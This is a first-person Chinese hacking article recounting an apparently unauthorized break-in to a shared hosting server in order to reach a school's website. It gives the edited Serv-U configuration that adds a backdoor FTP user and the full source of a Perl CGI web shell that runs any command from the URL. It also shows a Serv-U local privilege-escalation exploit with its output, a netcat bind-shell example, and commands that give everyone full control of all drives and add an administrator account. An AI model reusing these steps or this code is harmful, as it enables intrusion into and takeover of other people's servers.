网络安全 频道

你BT我更BT!记一次入侵BT服务器

先通过 aspshell 下载 Serv-U 的任意一个快捷方式,然后本地查看属性的目标,呵呵,原来 Serv-U 的目录是 "C:\Program Filesewfq4qrqtgy4635\Serv-U\" ,这下好了,直接跳转目录。OH~,yes~~,看到了,马上修改 ServUDaemon.ini文件,这个服务器居然放了 280 个用户,狂晕……不管了,先在添加 [Domain1] 里加一行:

User281=angel|1|0

然后加上

[USER=angel|1]

Password=ng98F85379EA68DBF97BAADCA99B69B805

HomeDir=D:\websites

RelPaths=1

TimeOut=600

Maintenance=System

Access1=D:\websites|RWAMELCDP

SKEYValues=

添加一个angel,密码为111111的用户,具有最高权限执行,然后我们就可以ftp上去quotesiteexecxxxxxxxx了,嘻嘻偷笑中……

不过残酷现实再一次粉碎了我的计划,修改好文件以后提交,居然是没有修改成功,看来还是权限,权限权限整惨人埃

不过还是有希望的,因为刚才我们看到了系统装了黑冰,有些版本存在“ISSRealSecure/BlackICE协议分析模块SMB解析堆溢出漏洞”,可以远程利用的,手头上没有编译器,没有办法编译代码。

还有就是Perl,这个是个很大的突破口,因为Perl目录一般要erveryone完全控制的,不管他用isap还是perl.exe一般都是可写、可执行的,马上下载Perl的快捷方式来看看路径,呵呵,看到了,原来D:\user\bin就是存放perl的bin目录下的所有文件,这么说这个目录可能可以写,也可能可以执行咯,马上传一个su.exe(针对目前所有版本的Serv-U本地提升权限漏洞)上去,呵呵,传上去了,太好了,现在就是执行了,刚才我们试了aspshell、phpshell都不行,现在就看最后的希望了,找呀找啊,终于在我硬盘上找到一个cgishell,很老了,文件日期是2002年6月30日的,代码如下:

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT,"Content-type:text/html\r\n\r\n",27);

$_=$ENV{QUERY_STRING};

s/%20//ig;

s/%2f/\//ig;

$execthis=$_;

syswrite(STDOUT,"

\r\n",13);

open(STDERR,">&STDOUT")||die"Can’tredirectSTDERR";

system($execthis);

syswrite(STDOUT,"\r\n

\r\n",17);

close(STDERR);

close(STDOUT);

exit;

我用过最好的cgishell,保存为一个cgi文件执行,晕……居然不支持!一阵阵郁闷袭来,2秒钟的郁闷后,想到还有一线希望,那就是pl,我们还没有试试pl扩展呢,把刚才的cgi文件改为pl文件,提交 http://anyhost//cmd.pl?dir ,我的天啊!!

显示“拒绝访问”,终于可以执行了!太兴奋了,马上提交:

http://anyhost//cmd.pl?d:\user\bin\su.exe



返回:

Serv-u>3.xLocalExploitbyxiaolu

USAGE:serv-u.exe"command"

Example:serv-u.exe"nc.exe-l-p99-ecmd.exe"

嘻嘻~~现在是IUSR权限,那又怎么样?看你这次还不死?提交:

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

 

返回下面的信息,就表示成功了!!!

Serv-u>3.xLocalExploitbyxiaolu

<220Serv-UFTPServerv5.2forWinSockready...

>USERLocalAdministrator

<331Usernameokay,needpassword.

******************************************************

>PASS#l@$ak#.lk;0@P

<230Userloggedin,proceed.

******************************************************

>SITEMAINTENANCE

******************************************************

[+]CreatingNewDomain...

<200-DomainID=2

<220Domainsettingssaved

******************************************************

[+]Domainxl:2Created

[+]CreatingEvilUser

<200-User=xl

200Usersettingssaved

******************************************************

[+]NowExploiting...

>USERxl

<331Usernameokay,needpassword.

******************************************************

>PASS111111

<230Userloggedin,proceed.

******************************************************

[+]NowExecuting:cacls.exec:/E/T/Geveryone:F

<220Domaindeleted

******************************************************

每提交完一次都稍微等一下,因为这些命令需要时间处理的,不一会儿,就把所有分区设置为everyone完全控制了,可以任意操作硬盘的东西了,但是有些命令还是受了限制,因为权限还没有提升,现在我们把自己的用户提升为管理员:

http://anyhost//cmd.pl?d:\user\bin\su.exe " net l ... s IUSR_anyhost /add"

现在我们通过web方式,执行的命令就是以administrator的身份执行的了,相信到这里,下面的事该做什么,大家应该知道了吧?马上找到那个学校的目录,进去咯~~目的达到了,本来还想做一个3389的肉鸡的,想想算了,这种BT管理员的地盘,我也占领不了多久,留点提示到他的桌面就over了。

说真的,搞安全这么久,从来没有遇见这么棘手的虚拟主机,要不是装了Perl,还真是束手无策!本文技术含量不高,只是分享一下希望其中的思路,如果有一个人从中受益,这篇文章就完成它的使命了。

0
相关文章